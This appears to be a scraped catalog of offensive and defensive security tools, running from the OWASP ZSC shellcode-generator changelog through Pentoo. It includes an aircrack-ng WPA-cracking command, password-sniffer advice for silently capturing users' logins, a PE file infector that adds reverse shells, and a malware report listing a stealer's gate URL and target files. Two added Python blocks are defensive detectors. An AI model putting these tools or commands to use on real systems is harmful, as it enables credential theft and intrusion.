add filename writer in gcc commandline in output file
fixed bug in encoding module not available
fixed bug in os module not available
add -wizard switch
add installer, use zsc commandline in terminal after installed
add uninstaller
This software can only be run on Linux since this version
change output to .c file and automated shellcode generating
add color output for terminal
add inc encoding chmod() [linux_x86]
add inc_timesyouwant chmod() [linux_x86]
add dec encoding chmod() [linux_x86]
add dec_timesyouwant chmod() [linux_x86]
add features table inside features_table.html
add -about to menu for developers name and etc
fixed permission number calculating in chmod() [linux_x86]
software's signature changes
bug fix reported by user in executing on linux, color function
add xor_random encoding chmod() [linux_x86]
add xor_yourvalue encoding chmod() [linux_x86]
add add_random encoding chmod() [linux_x86]
add add_yourvalue encoding chmod() [linux_x86]
add sub_random encoding chmod() [linux_x86]
add sub_yourvalue encoding chmod() [linux_x86]
fixed shellcode encode type checking
[linux_x86 modules completed]
add script_executor() [linux - using command execution]
add download_execute() [linux_x86 - using command execution (wget)]
add download() [linux_x86 - using command execution (wget)]
add dir_create() [linux_x86 using command execution]
add file_create() [linux_x86 using command execution]
add encodes file for next version released
add system() [linux_x86 command execute]
fixed chmod filename char length [linux_x86]
fixed exec filename char length [linux_x86]
fixed write filename length [linux_x86]
fixed write content length [linux_x86]
fixed write length calculator [linux_x86]
and fixed some other bugs in coding [core]
system() function added in script, you can use it to do anything and generate any command line shellcode.
add chmod() [linux_x86] -> chmod(/path/file,perm_num)
add write() [linux_x86] -> write(/path/file,content)
add exec() [linux_x86] -> exec(/path/file)
add encode [none - all os]
add mix_all encoding in chmod() [linux_x86]
add xor_random encoding in system() [linux_x86]
add xor_yourvalue encoding in system() [linux_x86]
add add_random encoding in system() [linux_x86]
add add_yourvalue encoding in system() [linux_x86]
add sub_random encoding in system() [linux_x86]
add sub_yourvalue encoding in system() [linux_x86]
add inc encoding in system() [linux_x86]
add inc_timesyouwant encoding in system() [linux_x86]
add dec encoding in system() [linux_x86]
add dec_timesyouwant encoding in system() [linux_x86]
add mix_all encoding in system() [linux_x86]
add xor_random encoding in file_create() [linux_x86]
add xor_yourvalue encoding in file_create() [linux_x86]
add add_random encoding in file_create() [linux_x86]
add add_yourvalue encoding in file_create() [linux_x86]
add sub_random encoding in file_create() [linux_x86]
add sub_yourvalue encoding in file_create() [linux_x86]
add inc encoding in file_create() [linux_x86]
add inc_timesyouwant encoding in file_create() [linux_x86]
add dec encoding in file_create() [linux_x86]
add dec_timesyouwant encoding in file_create() [linux_x86]
add mix_all encoding in file_create() [linux_x86]
add xor_random encoding in dir_create() [linux_x86]
add xor_yourvalue encoding in dir_create() [linux_x86]
add add_random encoding in dir_create() [linux_x86]
add add_yourvalue encoding in dir_create() [linux_x86]
add sub_random encoding in dir_create() [linux_x86]
add sub_yourvalue encoding in dir_create() [linux_x86]
add inc encoding in dir_create() [linux_x86]
add inc_timesyouwant encoding in dir_create() [linux_x86]
add dec encoding in dir_create() [linux_x86]
add dec_timesyouwant encoding in dir_create() [linux_x86]
add mix_all encoding in dir_create() [linux_x86]
add xor_random encoding in download() [linux_x86]
add xor_yourvalue encoding in download() [linux_x86]
add add_random encoding in download() [linux_x86]
add add_yourvalue encoding in download() [linux_x86]
add sub_random encoding in download() [linux_x86]
add sub_yourvalue encoding in download() [linux_x86]
add inc encoding in download() [linux_x86]
add inc_timesyouwant encoding in download() [linux_x86]
add dec encoding in download() [linux_x86]
add dec_timesyouwant encoding in download() [linux_x86]
add mix_all encoding in download() [linux_x86]
add xor_random encoding in download_execute() [linux_x86]
add xor_yourvalue encoding in download_execute() [linux_x86]
add add_random encoding in download_execute() [linux_x86]
add add_yourvalue encoding in download_execute() [linux_x86]
add sub_random encoding in download_execute() [linux_x86]
add sub_yourvalue encoding in download_execute() [linux_x86]
add inc encoding in download_execute() [linux_x86]
add inc_timesyouwant encoding in download_execute() [linux_x86]
add dec encoding in download_execute() [linux_x86]
add dec_timesyouwant encoding in download_execute() [linux_x86]
add mix_all encoding in download_execute() [linux_x86]
add xor_random encoding in system() [linux_x86]
add xor_yourvalue encoding in system() [linux_x86]
add add_random encoding in system() [linux_x86]
add add_yourvalue encoding in system() [linux_x86]
add sub_random encoding in system() [linux_x86]
add sub_yourvalue encoding in system() [linux_x86]
add inc encoding in system() [linux_x86]
add inc_timesyouwant encoding in system() [linux_x86]
add dec encoding in system() [linux_x86]
add dec_timesyouwant encoding in system() [linux_x86]
add mix_all encoding in system() [linux_x86]
add xor_random encoding in script_executor() [linux_x86]
add xor_yourvalue encoding in script_executor() [linux_x86]
add add_random encoding in script_executor() [linux_x86]
add add_yourvalue encoding in script_executor() [linux_x86]
add sub_random encoding in script_executor() [linux_x86]
add sub_yourvalue encoding in script_executor() [linux_x86]
add inc encoding in script_executor() [linux_x86]
add inc_timesyouwant encoding in script_executor() [linux_x86]
add dec encoding in script_executor() [linux_x86]
add dec_timesyouwant encoding in script_executor() [linux_x86]
add mix_all encoding in script_executor() [linux_x86]
add add_random encoding in write() [linux_x86]
add xor_random encoding in write() [linux_x86]
add sub_random encoding in write() [linux_x86]
add xor_random encoding in exec() [linux_x86]
add sub_random encoding in exec() [linux_x86]
add add_random encoding in exec() [linux_x86]
fixed bug in system() when len(command) is less than 5
fixed bug in encode module add_random chmod() [linux_x86]

Download OWASP ZSC
PACKET SENDER - THE UDP AND TCP NETWORK TEST UTILITY

Packet Sender is an open source utility to allow sending and receiving TCP and UDP packets. It is available free (no ads / no bundleware) for Windows, Mac, and Linux. It can be used for both commercial and personal use (license). It's designed to be very easy to use while still providing enough features for power users to do what they need.
Mobile

The native mobile versions have been abandoned to focus on the more popular and more capable desktop version. However, the GitHub projects for both iOS and Android are MIT licensed and available for forking.

Change log

Version 2015-04-19
Portable mode
Read in file from command line
Save traffic log
Mobile versions have been abandoned. Project focus
is now on the far more popular desktop version.
Version 2015-02-13
Migrated to GitHub
New vector-based logo
Bug fix in quick-disable/enable
Migrated to Qt 5.4
Ubuntu version brought up to date.
Forums are closed (spammers killed it).
Version 2014-10-07
Initial launch of forums.
Multi-Send.
Quick-send from traffic log selected packets.
Packet Export/Import.
Rolling traffic log support.
Numerous configuration settings added:
Copy raw packet data to clipboard.
Receive before send.
Connection delays for slow devices.
Command line interface default binds to 0.
Universal (XP through 8.1) Windows installer.
Migrated to Qt 5.3
Some rework of the "About" section.
Version 2014-02-22
TCP connections are now fully threaded (no more UI
freezes).
Brand new and highly capable command line
interface. (Run PacketSender --help)
Some mild UI enhancements to make sending easier.
Ubuntu version brought up to date.
Windows XP now separated.
Qt 5.2
Version 1.5 (Mobile)
Android version released.
Version 2013-11-18
Copy to Clipboard button on traffic log.
Name prompt for traffic log.
Version 2013-11-11
Bad installer on Windows. No other changes made.
Version 2013-11-09
Searching packets from traffic log.
Fixed some traffic log stability problems.
Version 2013-11-05
Added resending packets at user-specified intervals.
Traffic log sped up significantly.
Packet searching.
Table headers (both saved packets and traffic log)
can be rearranged.
Response packet for TCP actually works now.
Response packet data can be manually updated.
About / License stuff moved to another tab.
Internal libraries updated.
Version 2013-10-20
64-bit Ubuntu and Linux Mint support.
Version 2013-10-14
Ubuntu and Linux Mint support.
Version 2013-05-20
Saving is less quirky.
Domain names can be used in IP address line.
Packet Sender will do a quick lookup to find the IP.
Internal libraries updated.
Version 2012-09-12
Public release of desktop version.

Download Packet Sender

PACKETH - ETHERNET PACKET GENERATOR

PackETH is a GUI and CLI packet generator tool for Ethernet. It allows you to create and send any possible packet or sequence of packets on the Ethernet link. It is very simple to use, powerful, and supports many adjustments of parameters while sending a sequence of packets. And lastly, it has the most beautiful web site of all the packet generators.
Features

you can create and send any ethernet packet. Supported protocols:
ethernet II, ethernet 802.3, 802.1q, QinQ, user defined ethernet frame
ARP, IPv4, IPv6, user defined network layer payload
UDP, TCP, ICMP, ICMPv6, IGMP, user defined transport layer payload
RTP (payload with options to send a sine wave of any frequency for G.711)
JUMBO frames (if network driver supports it)
sending sequence of packets
delay between packets, number of packets to send
sending with max speed, approaching the theoretical boundary
change parameters while sending (change IP & mac address, UDP payload, 2 user defined bytes, etc.)
saving configuration to a file and loading from it - pcap format supported

Download PackETH
PASSGEN - RANDOM CHARACTER GENERATOR CRUNCH TO CRACK WPA/WPA2

Passgen is an alternative to the random character generator crunch which attempts to solve cracking WPA/WPA2 keys by randomizing the output, as opposed to generating a sequential list (aaaaaaaa, aaaaaaab, aaaaaaac, etc.).
Example usage with aircrack-ng:
python passgen.py -l | sudo aircrack-ng --bssid 00:11:22:33:44:55 -w - WiFi.cap

Argument switches are as follows:

-l lowercase ascii
-l1 lowercase ascii + digits(0-9)
-U uppercase ascii
-U1 uppercase ascii + digits
-lU lowercase + uppercase ascii
-lU1 lowercase + uppercase ascii + digits
-C [char] [length] custom character set + length

Download Passgen
PASSWORD CRACKING SUITE

How To Use It:

git clone https://github.com/TecnoHack/PasswordCracking-Suite.git
chmod +x csuit.py
./csuit.py

Dics Path:

In this path, you can add any dictionary you would like to use.
Tools Path:

In this path, the script will install 3rd party tools. You can
download some here:
http://www.moehre.org/bruteforce.html
http://cyberwarzone.com/cyberwarfare/password-crackingmega-collection-password-cracking-word-lists
http://www.packetstormsecurity.org/Crackers/wordlists/
http://www.theargon.com/achilles/wordlists/
http://www.openwall.com/wordlists/
http://www.outpost9.com/files/WordLists.html

Tools used by the script:

Hash-Identifier --> https://code.google.com/p/hashidentifier/
Findmyhash --> https://code.google.com/p/findmyhash/
John The Ripper --> http://www.openwall.com/john/
Crunch --> http://sourceforge.net/projects/crunch-wordlist/

Available Hash Types:

afs bf bfegg bsdi crc32 crypt
des django dmd5 dominosec dragonfly3-32 dragonfly3-64
dragonfly4-32 dragonfly4-64 drupal7 dummy dynamic_n
epi episerver gost hdaa hmac-md5 hmac-sha1
hmac-sha224 hmac-sha256 hmac-sha384 hmac-sha512
hmailserver ipb2 keepass keychain krb4 krb5 lm lotus5
md4-gen md5 md5ns mediawiki mscash mscash2 mschapv2
mskrb5 mssql mssql05 mysql mysql-sha1 nethalflm netlm
netlmv2 netntlm netntlmv2 nsldap nt nt2 odf office
oracle oracle11 osc pdf phpass phps pix-md5 pkzip po
pwsafe racf rar raw-md4 raw-md5 raw-md5u raw-sha
raw-sha1 raw-sha1-linkedin raw-sha1-ng raw-sha224
raw-sha256 raw-sha384 raw-sha512 salted-sha1 sapb
sapg sha1-gen sha256crypt sha512crypt sip ssh
sybasease trip vnc wbb3 wpapsk xsha xsha512 zip

Download Password Cracking Suite

PASSWORD SNIFFER CONSOLE - COMMAND-LINE TOOL TO SNIFF AND CAPTURE HTTP/FTP/POP3/SMTP/IMAP PASSWORDS

Password Sniffer Console is the all-in-one command-line based password sniffing tool to capture Email, Web and FTP login passwords passing through the network.
It automatically detects the login packets on the network for various protocols and instantly decodes the passwords.
Here is the list of supported protocols,

HTTP (BASIC authentication)

FTP

POP3

IMAP

SMTP

In addition to recovering your own lost passwords, you can use this tool in the following scenarios:

Run it on a gateway system where all of your network's traffic passes through.

In a MITM attack, run it on the middle system to capture the passwords from the target system.

On a multi-user system, run it under an Administrator account to silently capture passwords for all the users.

It includes an installer which installs WinPcap, the network capture driver required for sniffing. For Windows 8, first you have to manually install the WinPcap driver (in Windows 7 compatibility mode) and then run our installer to install only Password Sniffer Console.
It is a very useful tool for penetration testers, and being a command-line tool makes it suitable for automation.
It works on both 32-bit & 64-bit platforms, from Windows XP to Windows 8.
Requirements

PasswordSnifferConsole requires WinPcap (http://www.winpcap.org), the industry standard packet capture library for Windows. By default the latest version of WinPcap (as of this writing v4.1.2) is installed automatically during the installation of Password Sniffer Console.
However, if you don't want it, you can uncheck it during installation and later install the latest version manually.
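The same login exchanges the sniffer decodes (HTTP Basic, FTP and POP3 USER/PASS, IMAP LOGIN, SMTP AUTH PLAIN/LOGIN) can be watched from the defender's side to find services still accepting credentials in cleartext. The detector below is an added example, not Password Sniffer Console's code; it assumes a capture already reduced to (destination port, client-to-server line) pairs, maps protocols by well-known port, and keeps only the username and the password length.

```python
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Well-known ports of the cleartext protocols the detector understands (assumption:
# the capture was taken on standard ports; TLS ports such as 443/993/995 are skipped).
PORT_PROTOCOL = {80: "HTTP", 21: "FTP", 110: "POP3", 143: "IMAP", 25: "SMTP"}


@dataclass
class Finding:
    protocol: str
    port: int
    username: str
    secret_len: int  # only the length is kept; the password itself is never stored


def _b64(text: str) -> Optional[bytes]:
    """Strict base64 decode; None for anything that is not valid base64."""
    try:
        return base64.b64decode(text, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def detect_cleartext_logins(capture: List[Tuple[int, str]]) -> List[Finding]:
    """Walk client-to-server payload lines and report each credential that
    crossed the wire unencrypted, so the service can be migrated to TLS."""
    findings: List[Finding] = []
    pending_user: Dict[int, str] = {}      # FTP/POP3: USER seen, PASS not yet
    smtp_login: Dict[int, List[str]] = {}  # SMTP AUTH LOGIN: base64 lines so far
    for port, raw_line in capture:
        proto = PORT_PROTOCOL.get(port)
        if proto is None:
            continue  # unknown or encrypted protocol: nothing to inspect
        line = raw_line.rstrip("\r\n")
        if proto == "HTTP":
            m = re.match(r"Authorization:\s*Basic\s+(\S+)", line, re.I)
            decoded = _b64(m.group(1)) if m else None
            if decoded and b":" in decoded:          # user:password
                user, pw = decoded.decode("latin-1").split(":", 1)
                findings.append(Finding(proto, port, user, len(pw)))
        elif proto in ("FTP", "POP3"):
            m = re.match(r"(USER|PASS)\s+(.*)", line, re.I)
            if m and m.group(1).upper() == "USER":
                pending_user[port] = m.group(2)
            elif m and port in pending_user:
                findings.append(Finding(proto, port, pending_user.pop(port), len(m.group(2))))
        elif proto == "IMAP":                        # tag LOGIN user pass (quotes optional)
            m = re.match(r'\S+\s+LOGIN\s+"?([^"\s]+)"?\s+"?([^"\s]+)"?', line, re.I)
            if m:
                findings.append(Finding(proto, port, m.group(1), len(m.group(2))))
        elif proto == "SMTP":
            m = re.match(r"AUTH\s+PLAIN\s+(\S+)", line, re.I)
            if m:
                parts = (_b64(m.group(1)) or b"").split(b"\0")
                if len(parts) == 3:                  # authzid \0 authcid \0 password
                    findings.append(Finding(proto, port, parts[1].decode("latin-1"), len(parts[2])))
            elif re.match(r"AUTH\s+LOGIN\s*$", line, re.I):
                smtp_login[port] = []
            elif port in smtp_login:                 # next two client lines: user, password
                smtp_login[port].append(line.strip())
                if len(smtp_login[port]) == 2:
                    user, pw = [_b64(x) for x in smtp_login.pop(port)]
                    if user is not None and pw is not None:
                        findings.append(Finding(proto, port, user.decode("latin-1"), len(pw)))
    return findings


# Constructed client-to-server lines (destination port, payload); not a real capture.
SAMPLE_CAPTURE: List[Tuple[int, str]] = [
    (80, "GET /admin HTTP/1.1"),
    (80, "Authorization: Basic " + base64.b64encode(b"alice:s#cr3t").decode()),
    (21, "USER bob"),
    (21, "PASS hunter2"),
    (110, "USER carol@example.test"),
    (110, "PASS letmein"),
    (143, 'a001 LOGIN dave "pa55"'),
    (25, "AUTH PLAIN " + base64.b64encode(b"\0erin\0password").decode()),
    (25, "AUTH LOGIN"),
    (25, base64.b64encode(b"frank").decode()),
    (25, base64.b64encode(b"qwerty").decode()),
    (443, "\x16\x03\x01 (TLS handshake, opaque to the detector)"),
]

if __name__ == "__main__":
    for f in detect_cleartext_logins(SAMPLE_CAPTURE):
        print(f"{f.protocol:<5} port {f.port:<4} user={f.username!r} "
              f"password={f.secret_len} chars in cleartext -> move this service to TLS")
```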

Download Password Sniffer Console

PEFRAME - TOOL TO PERFORM STATIC ANALYSIS ON PORTABLE EXECUTABLE MALWARE
PEframe is an open source tool to perform static analysis on Portable Executable malware.
Usage
$ peframe malware.exe
$ peframe [--option] malware.exe

Options
--json           Output in json
--import         Imported function and dll
--export         Exported function and dll
--dir-import     Import directory
--dir-export     Export directory
--dir-resource   Resource directory
--dir-debug      Debug directory
--dir-tls        TLS directory
--strings        Get all strings
--sections       Sections information
--dump           Dump all information

Install

Prerequisites
Python 2.6.5 -> 2.7.x

Install
from pypi
# pip install https://github.com/guelfoweb/peframe/archive/master.zip

from git
$ git clone https://github.com/guelfoweb/peframe.git
$ cd peframe
# python setup.py install

Example
$ peframe malware.exe

Short information
------------------------------------------------------------
File Name        malware.exe
File Size        935281 byte
Compile Time     2012-01-29 22:32:28
DLL              False
Sections
Hash MD5         cae18bdb8e9ef082816615e033d2d85b
Hash SHA1        546060ad10a766e0ecce1feb613766a340e875c0
Imphash          353cf96592db561b5ab4e408464ac6ae
Detected         Xor, Sign, Packer, Anti Debug, Anti VM
Directory        Import, Resource, Debug, Relocation, Security

XOR discovered
------------------------------------------------------------
Key length       Offset (hex)     Offset (dec)
                 0x5df4e          384846
                 0x5df4e          384846
                 0x5df4e          384846
                 0x5df4e          384846

Digital Signature
------------------------------------------------------------
Virtual Address  12A200
Block Size       4813 byte
Hash MD5         63b8c4daec26c6c074ca5977f067c21e
Hash SHA-1       53731a283d0c251f7c06f6d7d423124689873c62

Packer matched [4]
------------------------------------------------------------
Packer           Microsoft Visual C++ v6.0
Packer           Microsoft Visual C++ 5.0
Packer           Microsoft Visual C++
Packer           Installer VISE Custom

Anti Debug discovered [9]
------------------------------------------------------------
Anti Debug       FindWindowExW
Anti Debug       FindWindowW
Anti Debug       GetWindowThreadProcessId
Anti Debug       IsDebuggerPresent
Anti Debug       OutputDebugStringW
Anti Debug       Process32FirstW
Anti Debug       Process32NextW
Anti Debug       TerminateProcess
Anti Debug       UnhandledExceptionFilter

Anti VM Trick discovered [2]
------------------------------------------------------------
Trick            Virtual Box
Trick            VMware trick

Suspicious API discovered [35]
------------------------------------------------------------
Function         CreateDirectoryA
Function         CreateFileA
Function         CreateFileMappingA
Function         CreateToolhelp32Snapshot
Function         DeleteFileA
Function         FindFirstFileA
Function         FindNextFileA
Function         GetCurrentProcess
Function         GetFileAttributesA
Function         GetFileSize
Function         GetModuleHandleA
Function         GetProcAddress
Function         GetTempPathA
Function         GetTickCount
Function         GetUserNameA
Function         GetVersionExA
Function         InternetCrackUrlA
Function         LoadLibraryA
Function         MapViewOfFile
Function         OpenProcess
Function         Process32First
Function         Process32Next
Function         RegCloseKey
Function         RegCreateKeyA
Function         RegEnumKeyExA
Function         RegOpenKeyA
Function         RegOpenKeyExA
Function         Sleep
Function         WSAStartup
Function         WriteFile
Function         closesocket
Function         connect
Function         recv
Function         send
Function         socket

Suspicious Sections discovered [2]
------------------------------------------------------------
Section          .data
Hash MD5         b896a2c4b2be73b89e96823c1ed68f9c
Hash SHA-1       523d58892f0375c77e5e1b6f462005ae06cdd0d8
Section          .rdata
Hash MD5         41795b402636cb13e2dbbbec031dbb1a
Hash SHA-1       b674141b34f843d54865a399edfca44c3757df59

File name discovered [43]
------------------------------------------------------------
Binary           wiseftpsrvs.bin
Data             ESTdb2.dat
Data             Favorites.dat
Data             History.dat
Data             bookmark.dat
Data             fireFTPsites.dat
Data             quick.dat
Data             site.dat
Data             sites.dat
Database         FTPList.db
Database         sites.db
Database         NovaFTP.db
Executable       unleap.exe
Executable       explorer.exe
FTP Config       FTPVoyager.ftp
Library          crypt32.dll
Library          kernel32.dll
Library          mozsqlite3.dll
Library          userenv.dll
Library          wand.dat
Library          wininet.dll
Library          wsock32.dll
Text             Connections.txt
Text             ftplist.txt
Text             signons.txt
Text             signons2.txt
Text             signons3.txt

Url discovered [2]
------------------------------------------------------------
Url              RhinoSoft.com
Url              http://0uk.net/zaaqw/gate.php

Meta data found [4]
------------------------------------------------------------
CompiledScript   AutoIt v3 Script
FileVersion      3, 3, 8, 1
FileDescription
Translation      0x0809 0x04b0
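
Two of the indicators in a report like the one above, the Imphash and the Anti Debug / Suspicious API findings, can be recomputed from the import table alone. The following is an added example in Python and not peframe's code: it implements the Mandiant/pefile imphash normalisation as published (assumed to match pefile's output) and looks the imported names up against the API lists peframe printed above; the import table is a constructed sample, not one parsed from a real PE, so no pefile dependency is needed.

```python
"""Imphash and anti-debug / suspicious-API lookup over a constructed import table.

Added example, not peframe's code. ORDINAL_NAMES is a small subset of the
Winsock ordinal table pefile ships; the lists of API names come from the
peframe report above.
"""
import hashlib
from typing import Dict, List, Optional, Tuple

# One import as the PE import directory describes it:
# (dll name as stored, function name or None, ordinal or None).
Import = Tuple[str, Optional[str], Optional[int]]

# Imports by ordinal get a name before hashing. pefile carries full tables for
# ws2_32.dll, wsock32.dll and oleaut32.dll; this subset only serves the sample.
ORDINAL_NAMES: Dict[str, Dict[int, str]] = {
    "ws2_32": {3: "closesocket", 4: "connect", 16: "recv", 19: "send", 23: "socket"},
    "wsock32": {3: "closesocket", 4: "connect", 16: "recv", 19: "send", 23: "socket"},
}

# Names peframe flagged in the report above, used here as lookup tables.
ANTI_DEBUG = {
    "FindWindowExW", "FindWindowW", "GetWindowThreadProcessId", "IsDebuggerPresent",
    "OutputDebugStringW", "Process32FirstW", "Process32NextW", "TerminateProcess",
    "UnhandledExceptionFilter",
}
SUSPICIOUS = {
    "CreateToolhelp32Snapshot", "OpenProcess", "GetProcAddress", "LoadLibraryA",
    "MapViewOfFile", "RegCreateKeyA", "WSAStartup", "connect", "recv", "send", "socket",
}


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode("ascii")).hexdigest()


def normalise(dll: str, name: Optional[str], ordinal: Optional[int]) -> Tuple[str, str]:
    """Lower-case the library, drop a .dll/.sys/.ocx extension and resolve an
    ordinal-only import to a known name or to 'ordN'."""
    lib = dll.lower()
    base, dot, ext = lib.rpartition(".")
    if dot and ext in ("dll", "sys", "ocx"):
        lib = base
    if name is None:
        name = ORDINAL_NAMES.get(lib, {}).get(ordinal, f"ord{ordinal}")
    return lib, name


def imphash_string(imports: List[Import]) -> str:
    """The string that gets hashed: 'lib.func' pairs, lower-cased, in import
    order, comma-joined. Order matters, so a re-linked binary hashes differently."""
    parts = []
    for dll, name, ordinal in imports:
        lib, resolved = normalise(dll, name, ordinal)
        parts.append(f"{lib}.{resolved.lower()}")
    return ",".join(parts)


def imphash(imports: List[Import]) -> str:
    """MD5 of the normalised import list."""
    return md5_hex(imphash_string(imports))


def classify(imports: List[Import]) -> Dict[str, List[str]]:
    """Split the imported names into peframe-style categories, keeping order."""
    found: Dict[str, List[str]] = {"anti_debug": [], "suspicious": []}
    for dll, name, ordinal in imports:
        _, resolved = normalise(dll, name, ordinal)
        if resolved in ANTI_DEBUG:
            found["anti_debug"].append(resolved)
        elif resolved in SUSPICIOUS:
            found["suspicious"].append(resolved)
    return found


# Constructed import table in the style of the sample report above.
SAMPLE_IMPORTS: List[Import] = [
    ("KERNEL32.dll", "IsDebuggerPresent", None),
    ("KERNEL32.dll", "CreateToolhelp32Snapshot", None),
    ("KERNEL32.dll", "Process32FirstW", None),
    ("KERNEL32.dll", "GetProcAddress", None),
    ("USER32.dll", "FindWindowW", None),
    ("ADVAPI32.dll", "RegCreateKeyA", None),
    ("WS2_32.dll", None, 23),   # socket, imported by ordinal
    ("WS2_32.dll", None, 4),    # connect, imported by ordinal
    ("WS2_32.dll", None, 99),   # no name known for this ordinal: hashed as ord99
]

if __name__ == "__main__":
    print("Imphash", imphash(SAMPLE_IMPORTS))
    for kind, names in classify(SAMPLE_IMPORTS).items():
        print(kind, ", ".join(names))
```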

Download PEframe

PEINJECTOR - MITM PE FILE INFECTOR

The executable file format on the Windows platform is PE COFF. The peinjector provides different ways to infect these files with custom payloads without changing the original functionality. It creates patches, which are then applied seamlessly during file transfer. It is very performant, lightweight, modular and can be operated on embedded hardware.

Features

Full x86 and x64 PE file support.
Open Source
Fully working on Windows and Linux, including automated installation scripts.
Can be operated on embedded hardware, tested on a Raspberry Pi 2.
On Linux, all servers will be automatically integrated as a service, no manual configuration required.
Plain C, no external libraries required (peinjector).
MITM integration is available in C, Python and Java. A sample Python MITM implementation is included.
Foolproof, mobile-ready web interface. Anyone who can configure a home router can configure the injector server.
Easy to use integrated shellcode factory, including reverse shells, meterpreter, ... or own shellcode. Everything is available in 32 and 64 bit with optional automated encryption. Custom shellcode can be injected directly or as a new thread.
An awesome about page and much more, check it out.

Download PEInjector
PEMCRACKER - TOOL TO CRACK ENCRYPTED PEM FILES

This tool is inspired by pemcrack by Robert Graham. The purpose is to attempt to recover the password for encrypted PEM files while utilizing all the CPU cores.
It still uses high-level OpenSSL calls in order to guess the password. As an optimization, instead of continually checking against the PEM on disk, it is loaded into memory in each thread.

bwall@ragnarok:~$ ./pemcracker
pemcracker 0.1.0
pemcracker <path to pem> <word file>
pemcracker 0.1.0 by Brian Wallace (@botnet_hunter)

Usage Example
bwall@ragnarok:~/data/publicprojects/pemcracker$ ./pemcracker test.pem test.dict
Password is komodia for test.pem

Compiling
make

This is somewhat of a short side project, so my apologies for any issues. If there is desire for this project to be further developed, I will try to allocate time.

Alternatives

If you are looking for the fastest possible method of brute forcing PEM files, you may wish to try out John the Ripper. Its little-known ssh2john allows for converting PEM files to a format that can be fed into ./john. Details

Download Pemcracker
PENTESTBOX - PORTABLE PENETRATION TESTING DISTRIBUTION FOR WINDOWS ENVIRONMENTS

PentestBox is not like other penetration testing distributions, which run on virtual machines. It was created because more than 50% of penetration testing distribution users use Windows. So it provides an efficient platform for penetration testing on the Windows platform.
Check out the demo video: PentestBox Demo from Pentest Box
Easy To Use
It is a command-line utility, which is all you want.

Awesome Design
It is the same green font on a black terminal, but in a modern way. I am pretty sure you will like it.

Best Performance
PentestBox runs directly on the host machine instead of in a virtual machine, so the performance is obviously better.

No Dependencies Needed
All the dependencies required by the tools are inside PentestBox, so you can even run PentestBox on a freshly installed Windows without any hassle.

Portable
PentestBox is entirely portable, so now you can carry your own penetration testing environment on a USB stick. It will take care of the dependencies required to run the tools inside it.

Linux Environment
PentestBox contains nearly all Linux utilities like bash, cat, chmod, curl, git, gzip, ls, mv, ps, ssh, sh, uname and others.

Tools category

Web Vulnerability Scanners
Web Application Proxies
Web Crawlers
Information Gathering
Exploitation Tools
Password Attacks
Android Security
Reverse Engineering
Stress Testing
Sniffing
Forensic Tools
Wireless Attacks
Text Editors
Linux Utilities

How to include your own Tool

If you want to include a tool which is not currently present in PentestBox, then below are the ways to include it.

If it is a Python-based program
Place that folder in PentestBox_Directory/bin or in any folder inside bin.
As Python is configured inside PentestBox, you can directly go to that directory and then run that program by prepending python to the filename.
But if you want to set an alias for that program then please follow How to add an alias.

If it is a Ruby-based program
Place that folder in PentestBox_Directory/bin or in any folder inside bin.
As Ruby is configured inside PentestBox, you can directly go to that directory and then run that program by prepending ruby to the filename.
But if you want to set an alias for that program then please follow How to add an alias.

If it is an executable file
Place that folder in PentestBox_Directory/bin or in any folder inside bin.
You can directly access it by moving to that folder and typing the filename.
But if you want to set an alias for that program then please follow How to add an alias.

Download PentestBox
PENTESTPACKAGE - A PACKAGE OF MULTIPLE PENTEST SCRIPTS

CONTENTS:

Wordlists - Comprises password lists, username lists and subdomains
Web Service finder - Finds web services of a list of IPs and also returns any URL rewrites
Gpprefdecrypt.* - Decrypt the password of local users added via Windows 2008 Group Policy Preferences.
rdns.sh - Runs through a file of line-separated IPs and prints whether there is a reverse DNS set or not.
grouppolicypwn.sh - Enter domain user creds (doesn't need to be privileged) and it will communicate with the domain controllers and pull any stored CPASS from group policies and decode it to plain text. Useful for instant Domain Admin!
privchecker.sh - Very young script that simply checks DCenum against a list of users to find their group access, indicating any privileged users; this list can be edited.
NessusParserSummary.py - Parses Nessus results to give a summary breakdown of findings plus a host count next to each.
NessusParserBreakdown.py - Parses Nessus results to give a host-based breakdown of findings plus the port(protocol) and CVSS rating.
NmapParser.py - Parses raw NMAP results (or .nmap) and will create individual .csv files for each host with a breakdown of ports, service version, protocol and port status.
NmapPortCount.py - Parses raw NMAP results (or .nmap) and will generate a single CSV with a list of hosts, a count of how many open/closed/filtered ports each has, the OS detection and ICMP response.
Plesk-creds-gatherer.sh - Used on older versions of Plesk (before the encryption came in); allows you to pull out all the credentials from the databases using a nice Bash menu.
BashScriptTemplate.sh - Handy boilerplate template for use in new scripts.
PythonScriptTemplate.py - Handy boilerplate template for use in new scripts.
ipexplode.pl - Simply expands CIDRs and prints the IPs in a list, handy for when you need a list of IPs and not a CIDR.
LinEsc.sh - Linux escalation script. This will test common methods of gaining root access or show potential areas such as sticky perms that can allow manual testing for root escalation.
gxfr.py - GXFR replicates DNS zone transfers by enumerating subdomains using advanced search engine queries and conducting DNS lookups.
knock.sh - Simple script used to test/perform port knocking.
sslscan-split-file.py - Used to split a large SSLScan results file into individual SSLScan results.
TestSSLServer.jar - Similar tool to SSLScan but with different output.
wiffy.sh - Wiffy hacking tool, encapsulated in a single Bash script.

Download PentestPackage
PENTOO 2015 - SECURITY-FOCUSED LIVECD BASED ON GENTOO

Pentoo is a Live CD and Live USB designed for penetration testing and security assessment. Based on Gentoo Linux, Pentoo is provided both as 32 and 64 bit installable livecd. Pentoo is also available as an overlay for an existing Gentoo installation. It features packet injection patched wifi drivers, GPGPU cracking software, and lots of tools for penetration testing and security assessment. The Pentoo kernel includes grsecurity and PAX hardening and extra patches - with binaries compiled from a hardened toolchain with the latest nightly versions of some tools available.
It's basically a Gentoo install with lots of customized tools, a customized kernel, and much more. Here is a non-exhaustive list of the features currently included:
Hardened kernel with aufs patches
Backported Wifi stack from latest stable kernel release
Module loading support ala slax
Changes saving on USB stick
XFCE4 wm
CUDA/OpenCL cracking support with development tools
System updates if you got it finally installed
Put simply, Pentoo is Gentoo with the pentoo overlay. This overlay is available in layman, so all you have to do is layman -L and layman -a pentoo.
We have a pentoo/pentoo meta ebuild and multiple pentoo profiles, which will install all the pentoo tools based on USE flags.

Pentoo 2015.0 RC3.8

Current Features:
Changes saving (including unetbootin support)
CUDA/OpenCL enhanced cracking software
Kernel 4.0.8 and all needed patches for injection
XFCE 4.12
Please see the blog for full release notes, including known bootloader issues with some versions of unetbootin.
Full tools list.

